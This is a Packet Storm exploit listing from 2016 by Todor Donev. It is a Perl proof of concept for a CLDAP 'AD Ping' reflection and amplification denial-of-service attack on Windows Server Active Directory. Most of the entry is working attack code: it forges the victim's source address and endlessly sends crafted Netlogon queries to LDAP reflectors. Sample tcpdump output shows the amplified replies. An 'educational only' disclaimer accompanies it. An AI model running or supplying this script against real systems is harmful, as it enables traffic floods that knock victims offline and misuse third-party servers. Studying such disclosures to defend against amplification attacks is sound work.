Microsoft Windows Server AD LDAP RootDSE Netlogon Denial Of Service

2016-11-04T00:00:00
ID PACKETSTORM:139560
Type packetstorm
Reporter Todor Donev
Modified 2016-11-04T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon   
# (CLDAP "AD Ping") query reflection DoS PoC  
#  
# Copyright 2016 (c) Todor Donev  
# Varna, Bulgaria  
# todor.donev@gmail.com  
# https://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
# http://pastebin.com/u/hackerscommunity   
#  
# MS Windows Server 2016 [NOT TESTED !!!]  
#   
# Description:  
# The attacker sends a simple query to a vulnerable reflector   
# supporting the Connectionless LDAP service (CLDAP) and using   
# address spoofing makes it appear to originate from the intended   
# victim. The CLDAP service responds to the spoofed address,   
# sending unwanted network traffic to the attackeras intended target.  
#   
# Amplification techniques allow bad actors to intensify the size   
# of their attacks, because the responses generated by the LDAP   
# servers are much larger than the attackeras queries. In this case,   
# the LDAP service responses are capable of reaching very high   
# bandwidth and we have seen an average amplification factor of   
# 46x and a peak of 55x.  
#  
#  
# Disclaimer:  
# This or previous program is for Educational purpose ONLY. Do not   
# use it without permission. The usual disclaimer applies, especially   
# the fact that Todor Donev is not liable for any damages caused by   
# direct or indirect use of the information or functionality provided   
# by these programs. The author or any Internet provider bears NO   
# responsibility for content or misuse of these programs or any   
# derivatives thereof. By using these programs you accept the fact  
# that any damage (dataloss, system crash, system compromise, etc.)   
# caused by the use of these programs is not Todor Donev's   
# responsibility.  
#  
# Use at your own risk and educational  
# purpose ONLY!  
#  
# See also, UDP-based Amplification Attacks:  
# https://www.us-cert.gov/ncas/alerts/TA14-017A  
#  
#  
# # perl cldapdrdos.pl 192.168.1.112 192.168.1.146  
# [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC  
# [ ======  
# [ Usg: cldapdrdos.pl <ldap server> <target> <port>  
# [ Default port: 389  
# [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1  
# [ ======  
# [ <todor.donev@gmail.com> Todor Donev  
# [ Facebook: https://www.facebook.com/ethicalhackerorg  
# [ Website: https://www.ethical-hacker.org/  
# [ Sending CLDAP "AD Ping" packets..  
# ^C  
# # tcpdump -i eth0 -c4 port 389  
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode  
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes  
# 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57  
# 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...  
# 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57  
# 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...  
# 4 packets captured  
# 6 packets received by filter  
# 0 packets dropped by kernel  
#  
#  
#  
  
use Net::RawIP;  
  
print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";  
print "[ ======\n";  
print "[ Usg: $0 <ldap server> <target> <port>\n";  
print "[ Default port: 389\n";  
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";  
print "[ ======\n";  
print "[ <todor.donev\@gmail.com> Todor Donev\n";  
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";  
print "[ Website: https://www.ethical-hacker.org/\n";  
  
my $cldap = $ARGV[0];  
my $target = $ARGV[1];  
my $port = $ARGV[2] || '389';  
  
die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);  
  
my $query = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";  
$query .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";  
$query .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";  
$query .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";  
$query .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";  
$query .= "\x65\x74\x6c\x6f\x67\x6f\x6e";  
  
my $sock = new Net::RawIP({ udp => {} }) or die;  
print "[ Sending CLDAP \"AD Ping\" packets..\n";  
while () {  
select(undef, undef, undef, 0.40); # Sleep 400 milliseconds  
$sock->set({ ip => { saddr => $target, daddr => $cldap},  
udp => { source => 31337, dest => $port, data => $query} });  
$sock->send;  
}  
  
`